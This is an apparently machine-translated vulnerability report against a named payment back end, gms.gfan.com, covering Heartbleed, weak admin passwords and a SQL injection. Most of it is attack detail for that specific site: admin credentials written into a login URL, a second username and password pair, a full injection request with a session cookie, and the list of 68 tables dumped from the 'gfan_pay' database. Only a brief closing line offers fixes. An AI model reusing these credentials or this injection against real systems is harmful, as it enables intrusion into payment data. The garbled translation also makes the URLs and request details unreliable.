Openssl heartbleed/SQL injection vulnerability in the background
RT
Heartbleed vulnerability:
Https://gms.gfan.com
Weak password:
Http://gms.gfan.com: 8080/loginAction. do? Method = login & password = admin & username = admin
Duyun/123456
Injection:
GET/messageConsumeDetailClientAction. do? Method = findList & searchModel = 1 & type = on & beginDate = 2016-01-21 & endDate = 2016-01-28 & searchType = 3 & searchContent = & appKey = 0 & channelId = [injection point] HTTP/1.1 host: gms.gfan.com: 8080Proxy-Connection: keep-aliveAccept: text/html, application/xhtml + xml, application/xml; q = 0.9, image/webp ,*/*; q = 0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/Safari/537.36Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN, zh; q = 0.8, en; q = 0.6 Cookie: pgv_pvid = 7868685976; pgv_pvi = 3890574959; tma = large; tmd = 13.227519179.71033145.1453946820.70 .; bfd_g = signature; token = 1453966434; Jb1kcwceGvQ = "RSl21GK7Bz + signature + 0 aQJUFHk ="; cva4j + xqajE = "signature/Signature ="; _ utma = signature; _ utmc = 227519179; _ utmz = 227519179.1453946842.1.1.utmcsr = (direct) | utmccn = (direct) | utmcmd = (none); bytes = 1454031169; bytes = 1454031169; JSESSIONID = D0548E95C7A3ADA4A1F50AEF61E99E22 Administrator account password:
Database: gfan_pay
[68 tables]
+ ------------------------------ +
| User |
| Action_type |
| Admin_operate_log |
| Admin_user |
| App_info_apk |
| Card_config |
| Channel |
| Charge_log |
| Check_check_info |
| Check_check_status |
| Client_channel |
| Consume_log |
| Contrast_appkey_productid |
| Login_log_20121222 |
| Login_log_tmp |
| Payorder_status_log |
| Rebate_info |
| Recharge_alipay_policy_log |
| Recharge_channel |
| Recharge_channel_account |
| Recharge_dic_channel |
| Recharge_jd_policy_log |
| Recharge_junka_policy_log |
| Recharge_log |
| Recharge_mo9_policy_log |
| Recharge_order |
| Recharge_order_history |
| Recharge_order_operate_log |
| Recharge_order_reb |
| Recharge_request |
| Recharge_submit |
| Recharge_tenpay_policy_log |
| Recharge_uc_recharge_log |
| Recharge_unionpay_policy_log |
| Recharge_unionpay_trade_log |
| Recharge_wechat_policy_log |
| Sdk_app |
| Sdk_message_client_log |
| Sdk_message_pay_log |
| Sdk_pay_log |
| Sdk_pay_point_arrive |
| Sdk_save_ios_order |
| Sdk_sp_dictionary |
| Sdk_sp_sms |
| Sdk_tag_phone_log |
| Sdk_update_log |
| Shenzhoufu |
| Sp_channelinfo_admini |
| Sp_companyinfo_admini |
| Sp_developerinfo_admini |
| Sp_errormessages_log |
| Sp_install_forwardtell_log |
| Sp_partname_admini |
| Sp_pay_forwardtell_log |
| Sp_spcustom_admini |
| Sp_statusreport_log |
| Sp_support_admini |
| Sp_uploadinterface_log |
| Sp_userinfo_admini |
| Sp_version_admini |
| Test |
| Tgr_getcharge_logbyuid |
| Tgr_getconsume_logbyuid |
| Tgr_getsdk_appbyuid |
| Uc_pay_log |
| Uc_uid_imei |
| User_payorder_url |
| Wap_test |
+ ------------------------------ +
Solution:
Upgrade openssl
Enhance Password
SQL statements are constructed using parameterized methods to prevent the database from executing SQL statements inserted from user input.